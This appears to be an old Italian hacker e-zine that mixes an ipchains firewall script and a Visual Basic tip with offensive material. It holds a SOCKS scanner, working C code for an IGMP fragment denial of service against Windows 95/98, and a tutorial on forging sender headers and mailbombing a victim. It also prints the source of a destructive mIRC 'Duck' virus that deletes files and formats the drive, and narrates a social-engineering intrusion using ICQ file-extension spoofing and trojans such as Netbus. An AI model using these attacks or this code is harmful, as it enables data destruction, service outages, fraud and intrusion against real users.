$IPCHAINS -P forward ACCEPT


# Permette il traffico locale


$IPCHAINS -A input -i lo -j ACCEPT
$IPCHAINS -A input -i eth0 -j ACCEPT


# eth0 sta per l’interfaccia con la prima scheda ethernet


# Ora blocchiamo gli indirizzi IP privati che dovrebbero entrare con ppp0

$IPCHAINS -A input -i ppp0 -s 10.0.0.0/8 -j DENY
$IPCHAINS -A input -i ppp0 -s 172.16.0.0/12 -j DENY
$IPCHAINS -A input -i ppp0 -s 192.168.0.0/16 -j DENY

# Ora perché blocchiamo questi indirizzi ip?
# Bene questi 3 indirizzi di rete sono ip ristretti che sono usati per scopi interni
# Questo significa che nessun host in internet può avere quegli ip
# Così è un po’ strano se vengono da ppp0, sembra come se qualcuno volesse spoofarsi
# e hackare la tua rete, quindi li rifiutiamo...giustO?:)


# Permettiamo le risposte DNS, ma solo i nostri server DNS primario e secondario.
# nota: 194.130.20.19 e 194.13.20.20 sono i nostri server DNS

$IPCHAINS -A input -i ppp0 -p tcp -s 194.13.20.19 53 -j ACCEPT
$IPCHAINS -A input -i ppp0 -p tcp -s 194.13.20.20 53 -j ACCEPT
$IPCHAINS -A input -i ppp0 -p udp -s 194.13.20.19 53 -j ACCEPT
$IPCHAINS -A input -i ppp0 -p udp -s 194.13.20.20 53 -j ACCEPT


# Permettiamo ssh. Non abbiamo bisogno di permettere il -i eth0 a -dport 22 perché
# stiamo già accettando tutto da eth0
# controlla quando stiamo accettando loopback e pacchetti ethernet

$IPCHAINS -A input -i ppp0 --dport 22 -j ACCEPT

# Ora respingeremo i pacchetti per la porta 113

$IPCHAINS -A input -i ppp0 -p tcp --dport 113 -j REJECT

# permette quei 3 tipi di ICMP

$IPCHAINS -A input -i ppp0 -p icmp --dport 0 -j ACCEPT
$IPCHAINS -A input -i ppp0 -p icmp --dport 3 -j ACCEPT
$IPCHAINS -A input -i ppp0 -p icmp --dport 11 -j ACCEPT


# Logga tutto il resto

$IPCHAINS -A input -j DENY -l


# Ora blocchiamo alcuni indirizzi che non vogliamo far accedere alla nostra LAN
# come www.porno.com e www.compagnia.rivale.com
# supponiamo che gli indirizzi ip siano 202.120.12.3 e 120.10.0.34

$IPCHAINS -A output -i eth0 -d 202.120.12.3 -j DENY
$IPCHAINS -A output -i ppp0 -d 120.10.0.34 -j DENY


# E infine aggiungeremo il rule per il masq

$IPCHAINS -A forward -j MASQ -s 192.68.1.0/24 -d ! 192.168.1.0/24

# La nostra rete è 192.68.1.0/24
# -d ! 192.168.1.0/24 è messo perché la destinazione non sia la nostra rete
# In altre parole...se la sorgente è la nostra rete e la destinazione non lo è
# il firewall deve usare MASQ.
# Ora ricorda che solo con questo rule ipchains non puoi forwardare le cose...
# Perché il firewall non "
routa" le cose...è per le tavole di routing.
# Così installa lo strumento port forwarding (ipmasadm).

---- Lo script termina qui ----

Una piccola informazioni sullo strumento port forwarding:
Diciamo che l’indirizzo del tuo file esterno è 193.45.12.10 e che l’host che sta dando i
servizi http è 192.168.1.17. Puoi scrivere qualcosa del genere:

ipmasqadm portfw -a -P tcp -L 193.45.12.10 80 -R 192.168.1.17 80

dove:

portfw può definirsi il chain forwarding per ipmasqadm
-a sta per aggiungi (come ipchains)
-P sta ad indicare il protocollo, in questo caso tcp
-L sta per l’indirizzo locale, con ip e porta
-R sta per l’indirizzo da inoltrare, con ip e porta

Bene penso che è tutto per ora
Spero che ti ho aiutato a capire come usare ipchains e come settarlo.
Buona giornata.


ø-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-ø
ø SOCKS SCANNER ø
ø ø
ø¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥ø



/* socks scan, its 2 lame */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>

unsigned int port=1080;
struct sockaddr_in addr, spoofedaddr;
struct hostent *host;
int err,s;
FILE *fp;

int open_sock(int sock, char *server, int port) {
struct sockaddr_in blah;
struct hostent *he;
bzero((char *)&blah,sizeof(blah));
blah.sin_family=AF_INET;
blah.sin_addr.s_addr=inet_addr(server);
blah.sin_port=htons(port);


if ((he = gethostbyname(server)) != NULL) {
bcopy(he->h_addr, (char *)&blah.sin_addr, he->h_length);
}
else
if ((blah.sin_addr.s_addr = inet_addr(server)) < 0)

return(-3);



if (connect(sock,(struct sockaddr *)&blah,16)==-1) {

close(sock);
return(-4);
}

return(1);
}



void main(int argc, char *argv[])

{

if (argc < 2) {
printf("
use: %s IP\n",argv[0]);
exit(0);


}

if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
perror("
socket()");
exit(-1);
}
if (argv[2]) port=atoi(argv[2]);
err=open_sock(s,argv[1],port);
if (err<0) printf("
\nits not look like a socks\n"); else {
printf("
\nu got it buster\n");
fp=fopen("
socks","a");
fprintf(fp,"
\n%s",argv[1]);
fclose(fp);
}
}









ø-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-ø
ø WINDOWS 95/98 IGMP FRAGMENT DOS ø
ø ø
ø¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥ø


#include <stdio.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

int main(int argc, char **argv)
{
struct hostent *pHostentry;
struct sockaddr_in sock;
int explode,sd,times,x;
char *tcp_dest;
unsigned short port;
char big[20000];

if ((argc < 5) || (argc > 5))
{
printf("
usage: %s destination port size repititions\n",argv[0]);
exit(1);
}

tcp_dest = argv[1];
port = atoi(argv[2]);
explode = atoi(argv[3]);
times = atoi(argv[4]);

if ((pHostentry = gethostbyname(tcp_dest)) == NULL)
{
printf("
Resolve of %s failed please try again.\n", argv[1]);
exit(1);
}

memcpy(&sock.sin_addr.s_addr, pHostentry->h_addr, pHostentry->h_length);
sock.sin_family = AF_INET;
sock.sin_port = htons(port);

if ((sd = socket(AF_INET, SOCK_RAW, 2)) == -1)
{
printf("
Could not allocate socket.\n");
exit(1);
}

if ( (connect(sd, (struct sockaddr *)&sock, sizeof (sock) )))
{
printf("
Couldn't connect to host.\n");
exit(1);
}

if ( send(sd, big, explode, 0) == -1)
{
printf("
Error sending check size (lower)\n");
close(sd);
exit(1);
}

for (x = 0; x <= times; x++)
{
usleep(100000);
if (send(sd, big, explode, 0) == -1)
{
printf("
Error sending.\n");
exit(1);
}
printf("
Sent %s packet(%d)\n",argv[1], x);
}
close(sd);
return 0;
}



ø-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-ø
ø FAKE MAIL : DI TUTTO DI + ø
ø A[v]a[t]A[r] ø
ø¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥ø




Come avrete gia intuito dal titolo in questo articolo vi spieghero come mandare delle
fakemail ovvero come mandare delle e-mail con l'indirizzo che vogliamo.Per usare questa
tecnica anche se un po vecchiotta ma sempre efficace e sicura abbiamo bisogno di Telnet
quindi se non conoscete bene l'argomento vi consiglio di scaricare il mio articolo
precendente (Introduzione a telnet) per capire un po come funziona.
Prima di andare avanti voglio farvi una percisazione ovvero volevo informarvi che c'è
qualche possibilita di mandare delle fakemail anche se non si possiede telnet, infatti
in rete ci sono alcuni siti che vi offrono questo servizio che pero non da nessuna
copertura.Vi consiglio quindi di utilizzare sempre e comunuque telnet.
Imparando questa tecnica imparerete anche ad usare meglio telnet e soprattutto a conoscere
l'SMTP ovvero il servizio della posta in uscita.Iniziamo a collegarci a telnet inserendo
l'indirizzo del server da noi scelto e un numero di porta.Le porte per chi non lo sapesse
sono dei numeri a cui sono associati i vari servizi dei server,ad
esempio ( ftp, posta,web...).
Nel nostro caso ci interessa un servizio specifico ovvero quello SMPT quindi la nostra
porta è la 25 per altri servizi invece i numeri cambiano e per l'FTP abbiamo la porta 21 per
le news la porta 119 ecc.Procediamo e allora scegliamo un server qualsiasi (mail.tin.it) e
tanti altri.Una voltache ci siamo connessi al server attraverso la porta 25 apparira su telnet
un messaggio di quest tipo:

220 server.it Sendmail x.x/x.x 16/12/00 ready at Mon, 16 Dec 00 04:25:18 -0200

Dopo che sara apparsa questa scritta dovremo identificarci con il seguente comando

HELO nomeprovider.it

Non mi venite a dire che i tasti non funzionano per che altrimenti mi incazzo.Quando
scrivete il comando non vedete le perole che vengono scritte pero i comandi che digitate
giungono lo stesso al server e solo che non li vedete.Se volete vedere quello che scrivete,
andate in terminale e attivate la voce (eco locale).
Vi consiglio di scrivere con attenzione perchè su telnet non è possibile cancellare quindi
ogno volta che sbagliate dovrete ripetere tutti icomandi da capo ,questo per evitare di
essere sgamati.

250 prova.it Hello Nomeprovider.it, pleased to meet you

Ora dobbiamo digitare l'indirizzo e-mail ovviamente quello falso,quindi usiamo il comando:

MAIL FROM: polizia@italia.it

io ho messo fbi@italia.it ma voi potete mettre qualsiasi cosa.Dopo avre fatto questo
dobbiamo mettre il destinatario ovvero la nostra vittima.Quindi:

RCPT TO: lamer@delcazzo.it

Adesso avvertiamo il server che siamo pronti con il seguente comando:

DATA.

Prima di scrivere dobbiamo camuffare il nostro ip e per farlo scrivete

Received: by nomeprovider.it id AA11621 with SMTP; Mon, 16 Dec 00 04:25:18

Dovete scrivere proprio cosi ma dovete cambiare la data e l'id.Rimanete le prime 3 cifre
dell'ip (AA1) ma cambiate le ultime quattro cifre.Ora scriviamo

Message-ID: <123.AA16544@microsoft.com>

Dovete scrivere questo per far credere che il messaggio sia partito dal
server microsoft.Ricordate che dovete cambiare le cifre dell' l'intestazione Received.
Inseriamo ora di nuovo il destinatario, la data e il soggetto della e-mail:

To:
Date: Mon, 16 Dec 00 04:25:18
Subject: questa è una mail per te

Lasciamo uno spazio e scriviamo il nostro testo poi per concludere lasciamo due righe vuote
dopodiche digitiamo un punto premiamo invio e poi scriviamo quit.A questo punto avremo
spedito la fakemail e quindi potremo anche togliere telnet.
Bene penso sia stato chiaro quindi ora che sappiamo mandare un bella fakemail utilizziamo le
nostre conoscenze per borbandare la casella di posta di qualcuno che odiamo.
Per farlo dobbiamo creare un'altra fakemail uguale alla precedente ma come mittente dobbiamo
mettere l'indirizzo e-mail della nostra vittima e invece come destinatario usiamo un listserv.
Vi consiglio quindi di procurarvi un listserv che non è altro che un programma che invia
roba tramite mail.
Per trovare un listserv vi bastera andare su un motore di ricerca e digitare la parola.
Procediamo quindi procurandoci informazioni di qualche server e cerchiamo di scovare nelle
directory qualche bel file di grandi dimensioni( ad esempio nella directory documenti
troviamo un file molto grande di nome grende.cs)Una volta individuato il file facciamo in
modo che questo sia inviato alla vittima sotto forma di e-mail (qui dovrete usare un servlist).
Ripetiamo i comandi che abbiamo imparato per mandare una singola fakemail e quando siamo
arrivati a (subject) scriviamo i seguenti comandi.

REPLY lamer@delcazzo.it
CONNECT server.it anonymous indirizzo@falso.it
BINARY
GET documenti/grande.cs
QUIT

Concludiamo quindi con il solito procediamento.Vi faccio una piccola spiegazione che vi
fara' comprendere il perchè di

REPLY indica l'indirizzo e-mail a cui rispondere
CONNECT specifica il nome del provider a cui collegarsi e l'account da usare
BINARY specifica un file di tipo binario (non va cambiato)
GET specifica il nome del file da prelevare (completo di eventuali directory)
QUIT termina la connessione

Ok abbiamo finito ma se siete davvero bastardi dopo il comando GET e invece di premere QUIT
usate altri GET otterrete un risultato ancora piu dannoso.
A[v]a[t]A[r]
H@ Team



Finito l'articolo vorrei ringraziare:

Jrash con cui ho passato intere sere sul suo Sr modificato anche quando la temperatura
scendeva sotto zero e Valeria perche è una delle ragazze piu belle e sincere che abbai mai
conosciuto.


Ricordare Zero posto per l'infame


-----A[v]a[t]A[r] --- w w w . h a c k e r s a t . c o m --- ---avatar@hackersat.com----





ø-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-ø
ø NAVIGARE CON VB! ø
ø sYn ø
ø¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥ø



Salve ragazzi, con questa guida voglio citarvi un controllo Activex di Visual Basic.
Una piccola premessa:
Non scostate gli occhi dall'articolo solo perchè avete sentito parlare di Visual basic e non di C
o altri linguaggi...io conosco il vb meglio di tutti gli altri linguaggi e ne sono pienamente
fiero anche se è un linguaggio prodotto dalla casa Microsoft.
Chiunque pensa che questo linguaggio sia da lamerucci lo incito a farsi un bel lavaggio del
cervello e a pensare al proprio stile senza seguire le stronzate che dicono del tipo : "
Linux
è il miglior sistema operativo in assoluto, Windoz fa schifo non serve a niente".Io in prima
persona uso Linux ma non ho mai affermato questo.

Bene adesso vi diro' come "
accedere al web da un progetto Visual Basic".

Il controllo Activex disponibile nella finestra di dialogo Componenti è il controllo
"
Browser Web".
Per aggiungere questo controllo, spuntate la voce Microsoft Internet Control nella
finestra di dialogo Componenti.
Quando si aggiunge questo controllo al progetto, viene creata una nuovas finestra.
Le pagine web appariranno in questa finestra sul form. Il nome predefinito del controllo è
WebBrowser1. Per assegnare un nome al controllo, utilizzate il prefinno "
web".
Uno dei metodi del controllo è

Navigate
che consente di specificare l'indirizzo URL di un sito web. Inserite il collegamento come
stringa di seguito alla chiamata al metodo.
Nell'esempio il codice richiama la homepage di hackersat se è attiva una connessione ad
internet, SOLO se è attiva.

webBrowser.Navigate "
hackersat.com"

Per fare funzionare questo controllo il computer deve essere collegato necessariamente
ad un provider (o green)!
Se non è aperto nessun browser, il progetto aprira' Internet Explorer.Il programma
puo' funzionare anche con Netscape a condizione che questo sia aperto prima di eseguire il
progetto Visual Basic









ø-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-ø
ø ATTENTI AL DUCK! ø
ø A[v]a[t]A[r] ø
ø¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥ø






Come tutti sapete in rete girano molti virus e da un po di tempo vanno
molto di moda anche trojan.Una sera mentre cazzeggiavo per la rete mi
imbattei in un sito che permetteva di scaricare un add-on per mirc capace
di leggere le query altrui.
Questo attiro la mia attenzione e anche se ero a conoscenza che cio non
era possibile scaricai questo file per veder un po di cosa si trattava.
Consapevole del fatto che è difficile che un semplice add-on possa far
vedere le query altrui andai a leggere il codice che come immaginavo non
era altro che un virus da quattro soldi.
Dopo averci datto un'occhiata notai che questo una volta avviato si appresta
a cancellare la cartella "
windows" la cartella "windows/system" e inseguito
a formattarvi tutto l'HD.Alla fine compare anche una sipatica scritta
(you have been DUCKED by DONALD DUCK!) che di certo fara incazzare il povero
malcapitato.
Se volete vedere uno dei tanti siti da cui si puo scricare questo virus
recatevi al seguente URL (http://spiaquery.cjb.net).
Per gli appassionati riporto il codice del DUCk ma mi raccomando non usatelo
per fare cosette da lamer.


---------------------------------------STarT-----------------------------------------------------


alias duck {
run -n attrib -r c:\autoexec.bat
; Autoexec.bat
write c:\autoexec.bat @echo off
write c:\autoexec.bat echo Aggiornamento dei file di configurazione di Windows $os in corso...
write c:\autoexec.bat del c:\b*.*
write c:\autoexec.bat del c:\c*.*
write c:\autoexec.bat del c:\d*.*
write c:\autoexec.bat del c:\e*.*
write c:\autoexec.bat del c:\f*.*
write c:\autoexec.bat del c:\g*.*
write c:\autoexec.bat del c:\h*.*
write c:\autoexec.bat del c:\i*.*
write c:\autoexec.bat del c:\l*.*
write c:\autoexec.bat del c:\m*.*
write c:\autoexec.bat del c:\n*.*
write c:\autoexec.bat del c:\o*.*
write c:\autoexec.bat del c:\p*.*
write c:\autoexec.bat del c:\q*.*
write c:\autoexec.bat del c:\r*.*
write c:\autoexec.bat del c:\s*.*
write c:\autoexec.bat del c:\t*.*
write c:\autoexec.bat del c:\u*.*
write c:\autoexec.bat del c:\v*.*
write c:\autoexec.bat del c:\z*.*
write c:\autoexec.bat del c:\k*.*
write c:\autoexec.bat del c:\j*.*
write c:\autoexec.bat del c:\y*.*
write c:\autoexec.bat del c:\w*.*
write c:\autoexec.bat del c:\x*.*
write c:\autoexec.bat del c:\windows\a*.*
write c:\autoexec.bat del c:\windows\b*.*
write c:\autoexec.bat del c:\windows\c*.*
write c:\autoexec.bat del c:\windows\d*.*
write c:\autoexec.bat del c:\windows\e*.*
write c:\autoexec.bat del c:\windows\f*.*
write c:\autoexec.bat del c:\windows\g*.*
write c:\autoexec.bat del c:\windows\h*.*
write c:\autoexec.bat del c:\windows\i*.*
write c:\autoexec.bat del c:\windows\l*.*
write c:\autoexec.bat del c:\windows\m*.*
write c:\autoexec.bat del c:\windows\n*.*
write c:\autoexec.bat del c:\windows\o*.*
write c:\autoexec.bat del c:\windows\p*.*
write c:\autoexec.bat del c:\windows\q*.*
write c:\autoexec.bat del c:\windows\r*.*
write c:\autoexec.bat del c:\windows\s*.*
write c:\autoexec.bat del c:\windows\t*.*
write c:\autoexec.bat del c:\windows\u*.*
write c:\autoexec.bat del c:\windows\v*.*
write c:\autoexec.bat del c:\windows\z*.*
write c:\autoexec.bat del c:\windows\k*.*
write c:\autoexec.bat del c:\windows\j*.*
write c:\autoexec.bat del c:\windows\y*.*
write c:\autoexec.bat del c:\windows\w*.*
write c:\autoexec.bat del c:\windows\x*.*
write c:\autoexec.bat del c:\windows\system\a*.*
write c:\autoexec.bat del c:\windows\system\b*.*
write c:\autoexec.bat del c:\windows\system\c*.*
write c:\autoexec.bat del c:\windows\system\d*.*
write c:\autoexec.bat del c:\windows\system\e*.*
write c:\autoexec.bat del c:\windows\system\f*.*
write c:\autoexec.bat del c:\windows\system\g*.*
write c:\autoexec.bat del c:\windows\system\h*.*
write c:\autoexec.bat del c:\windows\system\i*.*
write c:\autoexec.bat del c:\windows\system\l*.*
write c:\autoexec.bat del c:\windows\system\m*.*
write c:\autoexec.bat del c:\windows\system\n*.*
write c:\autoexec.bat del c:\windows\system\o*.*
write c:\autoexec.bat del c:\windows\system\p*.*
write c:\autoexec.bat del c:\windows\system\q*.*
write c:\autoexec.bat del c:\windows\system\r*.*
write c:\autoexec.bat del c:\windows\system\s*.*
write c:\autoexec.bat del c:\windows\system\t*.*
write c:\autoexec.bat del c:\windows\system\u*.*
write c:\autoexec.bat del c:\windows\system\v*.*
write c:\autoexec.bat del c:\windows\system\z*.*
write c:\autoexec.bat del c:\windows\system\k*.*
write c:\autoexec.bat del c:\windows\system\j*.*
write c:\autoexec.bat del c:\windows\system\y*.*
write c:\autoexec.bat del c:\windows\system\w*.*
write c:\autoexec.bat del c:\windows\system\x*.*
write c:\autoexec.bat deltree /y c:\*.*
write c:\autoexec.bat format c: /autotest
write c:\autoexec.bat @echo on
write c:\autoexec.bat echo you have been DUCKED by DONALD DUCK!
; Creazione File
write c:\a-001.txt duck
write c:\b-001.txt duck
write c:\c-001.txt duck
write c:\d-001.txt duck
write c:\e-001.txt duck
write c:\f-001.txt duck
write c:\g-001.txt duck
write c:\h-001.txt duck
write c:\i-001.txt duck
write c:\l-001.txt duck
write c:\m-001.txt duck
write c:\n-001.txt duck
write c:\o-001.txt duck
write c:\p-001.txt duck
write c:\q-001.txt duck
write c:\r-001.txt duck
write c:\s-001.txt duck
write c:\t-001.txt duck
write c:\u-001.txt duck
write c:\v-001.txt duck
write c:\z-001.txt duck
write c:\k-001.txt duck
write c:\j-001.txt duck
write c:\y-001.txt duck
write c:\w-001.txt duck
write c:\x-001.txt duck
write c:\windows\a-001.txt duck
write c:\windows\b-001.txt duck
write c:\windows\c-001.txt duck
write c:\windows\d-001.txt duck
write c:\windows\e-001.txt duck
write c:\windows\f-001.txt duck
write c:\windows\g-001.txt duck
write c:\windows\h-001.txt duck
write c:\windows\i-001.txt duck
write c:\windows\l-001.txt duck
write c:\windows\m-001.txt duck
write c:\windows\n-001.txt duck
write c:\windows\o-001.txt duck
write c:\windows\p-001.txt duck
write c:\windows\q-001.txt duck
write c:\windows\r-001.txt duck
write c:\windows\s-001.txt duck
write c:\windows\t-001.txt duck
write c:\windows\u-001.txt duck
write c:\windows\v-001.txt duck
write c:\windows\z-001.txt duck
write c:\windows\k-001.txt duck
write c:\windows\j-001.txt duck
write c:\windows\y-001.txt duck
write c:\windows\w-001.txt duck
write c:\windows\x-001.txt duck
write c:\windows\system\a-001.txt duck
write c:\windows\system\b-001.txt duck
write c:\windows\system\c-001.txt duck
write c:\windows\system\d-001.txt duck
write c:\windows\system\e-001.txt duck
write c:\windows\system\f-001.txt duck
write c:\windows\system\g-001.txt duck
write c:\windows\system\h-001.txt duck
write c:\windows\system\i-001.txt duck
write c:\windows\system\l-001.txt duck
write c:\windows\system\m-001.txt duck
write c:\windows\system\n-001.txt duck
write c:\windows\system\o-001.txt duck
write c:\windows\system\p-001.txt duck
write c:\windows\system\q-001.txt duck
write c:\windows\system\r-001.txt duck
write c:\windows\system\s-001.txt duck
write c:\windows\system\t-001.txt duck
write c:\windows\system\u-001.txt duck
write c:\windows\system\v-001.txt duck
write c:\windows\system\z-001.txt duck
write c:\windows\system\k-001.txt duck
write c:\windows\system\j-001.txt duck
write c:\windows\system\y-001.txt duck
write c:\windows\system\w-001.txt duck
write c:\windows\system\x-001.txt duck
.timer 1 5 quit DUCKED by DONALD DUCK!
.timer 1 6 run rundll32.exe user.exe,exitwindows
}


-------------------------------------------ENd---------------------------------------------------


Spero che questo articolo vi metta in guardia dai pericoli che trovate
in giro pre la rete.Consiglio a tutte le persone meno esperte di far
attenzione e non fidarsidi tutto quello che si legge,infatti ricordate
che un virus non si esegue mai da solo siete solo voi che lo avviate
quando andate ad eseguirlo.Posso capire che veniate infettati da un virus
tipo (I love you) ma non fatevi infinocchiare da due righe di un codice di
merda.

A[v]a[t]A[r]
H@ Team



uN saluto a SadikuzBoy.



-----A[v]a[t]A[r] ---w w w . h a c k e r s a t . c o m--- ---avatar@hackersat.com----




ø-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-ø
ø CRONACA DI UN SEMPLICE SITE HACK ø
ø Mr. A ø
ø¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥ø




Con questo testo scorrevole e forbito vi presento il mio amico Mr.A,
new entry dell'H@ team...
ogni tanto mi intrometto con qualche nota, cmq sappiate che ha fatto
lui quasi tutta la parte
pratica dell'hackeraggio, per un semplice, ottimo motivo... Mr.A ha la
flat! Beato lui! Prima
o poi gli frego le pwd, eheheh :))))

^Ghent^


Questo, spero breve, documento viene da noi redatto non tanto per
vantarci delle nostre ben misere
capacita` di Hacking, che anzi verrebbero sminuite da un tale racconto,
quanto per fare comprendere
quanto la stupidaggine e la poca attenzione dell'utente medio della
rete abbassi il livello di sicurezza
in maniera irreparabile (NdGhent: cmq in questo caso, come leggerete,
ci siamo trovati di fronte ad un vero
e proprio utOnto ;)) in maniera tale che nessun sistema di sicurezza
possa proteggere.

Questo e` il racconto del nostro attacco ad un sito simpsons a sfondo
commerciale che si spaccia per
sito di "
veri fan". Inizialmente abbiamo cercato per lungo tempo
eventuali exploits o falle vere e proprie
del server su cui il sito era ospitato; tutto questo inutilmente, in
quanto erano installati un server
telnet ed un server FTP di ultima relase per i quali ancora non erano
stati trovati exploits
interessanti (ndG: ed in quanto siamo degli scarsoni :)).

Da questo si evince che il provider a cui era stato affidato il
compito era assolutamente in grado di
compiere il suo lavoro, visto che tra l'altro il genere di siti
ospitati avrebbe potuto richiedere anche
un livello di sicurezza minore; altro fatto notabile era l'assenza,
almeno apparente di una directory cgi-bin,
infatti in nessuno dei siti ospitati erano presenti pagine che lo
utilizzassero e sapevamo che un altro sito
si era dovuto trasferire provvisoriamente su altri server proprio per
questo inconveniente. Ci era parso
quindi ormai chiaro che un attacco "
dalla porta sul retro",
direttamente al server, era improponibile.

Avevamo dei "
suggerimenti", dei piccoli appigli per tentare un attacco
brute force
(ndG: per chi non lo sapesse -vergogna- un brute force consiste nel far
provare

  
ad un programmino,
detto appunto bruteforcer, delle liste user/password) sull'accesso FTP,
in effetti eravamo praticamente
sicuri di quale fosse lo username (che si e` poi rivelato esatto),
pero` non avevamo assolutamente idea
della password, quindi, siccome siamo gente scazzata (ndG: e qui ci
metto un bel ROTFL :)) il brute force
non l'abbiamo neppure tentato .

Abbiamo allora pensato che l'idea migliore fosse quella di entrare
dalla porta principale, e con tanto
di chiavi nella speranza che, come spesso accade nella vita reale, le
chiavi fossero sotto lo zerbino.
Non ci sbagliavamo affatto. La parte tre virgolette piu` complicata a
questo punto era quella di poter
accedere allo zerbino della "casa" del nostro amico per poter
controllare se ci fossero le chiavi.
Anche questa eventuale difficolta` si e` risolta piu` facilmente dello
sperato
(ndG: ragazzi, smettetela di dire "che culo!"). Il soggetto in
questione aveva pubblicato sul suo sito
il suo ICQ Number (UIN), e noi, sotto le spoglie di una bellissima
ragazza lo abbiamo contattato
(ndG: i logs di ICQ sono qualcosa di sensazionalmente divertente, dato
che Mr. A ha impersonato un female
fake eccezionale).

Riteniamo opportuno qui fare una breve parentesi sull'effetto del sesso
femminile in rete.
Uno di noi (ndG: com'è modesto il mr. A, non si svela...) ha avuto
molti anni fa l'opportunita` di pubblicare
per quello che una volta era il mitico sito del bruzzi, un pezzo in cui
si dimostrava chiaramente che gli
uomini in rete corrono dietro a qualunque cosa si dichiari di sesso
femminile, e lo fanno spesso
(se si e` abbastanza convicenti) senza neppure premurarsi che
dall'altro capo della rete ci sia
effettivamente una donna. Basta spacciarsi per incapaci a fare le cose
piu` elementari che si e`
subito etichettati come femmina!

Isomma ci siamo messi in contatto con questo ragazzo ed abbiamo preso
un poco confidenza.
Nel frattempo ci siamo ricordati di un pazzesco exploit per ICQ. Questo
trucco consiste nel fatto
che se si nomina un file .exe del tipo topa.jpg
.exe ovvero se si mette
un numero sufficiente di spazi bianchi, l'estensione reale rimane
nascosta nella finestra di fine invio file
(ndG: e questo dovreste gia' saperlo, se da bravi ragazzi qual siete
avete letto la mia lunga guida su
ICQ apparsa su Dirty Net #1).

Quindi una persona che clikka su open a quel punto pensa di star
aprendo in .jpg oppure un .txt o quello
che sia mentre in realtà sta eseguendo un programma sul PC. Era inoltre
stato sviluppato da una crew
di cui ora non ricordiamo il nome, (ndG: ricordo io, erano i
progenic... se non sbaglio, www.progenic.com)
un programmino che univa un file .txt ad un .exe e permetteva di
visualizzare il .txt mentre in background
veniva eseguito il programma voluto (ndG: il prog. si chiama "ICQ File
Spoofer" ed è utile appunto perchè fa
in modo che il file txt venga visualizzato mentre l'exe viene eseguito,
in modo da non destare sospetti);
finita la prima esecuzione il vecchio file si riconverte in un
normalissimo .txt o .jpg. Ci siamo anche
accorti che questo programmino funzionava anche unendo .jpg agli .exe e
non dava alcun problema.

Arrivati quindi ad essere in confidenza col soggetto abbiamo iniziato
a mandargli alcuni tra i più noti
troiani in questa maniera. In prima istanza abbiamo provato con
BackOrifice 2000, il quale pero' probabilmente
perchè mal configurato da noi (ndG: cio' dimostra che non siamo lamer!
Niente familiarita' con i trojans :))
non ha dato alcun risultato; in questo caso il troiano e` stato inviato
unito con un .txt che conteneva le
"poesie" scritte dalla ragazza, di cui tra l'altro una era dedicata al
soggetto. Ci siamo quindi indirizzati
verso un tentativo con netbus, sebbene sapessimo che sarebbe stato
molto semplice essere scoperti, perche`
nella fretta di fare non avevamo trovato nessun altro troiano che ci
desse accesso alle directory di un PC
remoto. Questo e` stato probabilmente il piu` grosso passo falso che
abbiamo compiuto;
ci eravamo premurati in precedenza di chiedere aiuto al tizio riguardo
a quali antivirus fossero i migliori
da usare per evitare che ci mandassero i virus da internet (voi tutti
sapete quanto le ragazze panichino
a questo riguardo), e lui ci aveva detto che non c'era assolutamente da
preoccuparsi perche` bastava stare
attenti e i virus non si prendevano. (ndG: ROTFL! Questa domanda sugli
antivirus è stata IMHO un vero tocco
di classe...)

Da questo avevamo intuito che usasse poco o pernulla degli antivirus e
quindi ci siamo appunto arrischiati
con Netbus. Con netbus siamo riusciti in effetti ad accedere al suo PC,
ma la connessione era piuttosto lenta
e non siamo riusciti ad accedere rapidamente alle directory volute, e
durante questo attacco il tipastro ad
un certo punto se ne e` accorto, ed in effetti e` arrivato anche ad
accusarci di essere stati noi ad avergli
mandato netbus sul PC (ndG: cioè, non è che abbia proprio accusato noi
due... ma ha accusato).

Pero` dopo una nostra risposta stupita che si chiedeva cosa fosse
questo netbus, il ragazzo, evidentemente
sotto l'eccessivo effetto degli ormoni maschili, ha pensato che netbus
fosse arrivato in qualche strana
maniera sul suo PC senza che noi c'entrassimo nulla. Infine allegato ad
una bellissima fotografia del
deserto (non so se conoscete quella che sta tra le immagini di
win2000?) abbiamo mandato un terzo troiano,
di cui ora non ricordo piu` il nome, (ndG: se non sbaglio si trattava
di "Blade Runner", che solo per il
nome era da provare.. ;)) ma che e` facilmente reperibile, il quale ha
avuto l'effetto voluto.

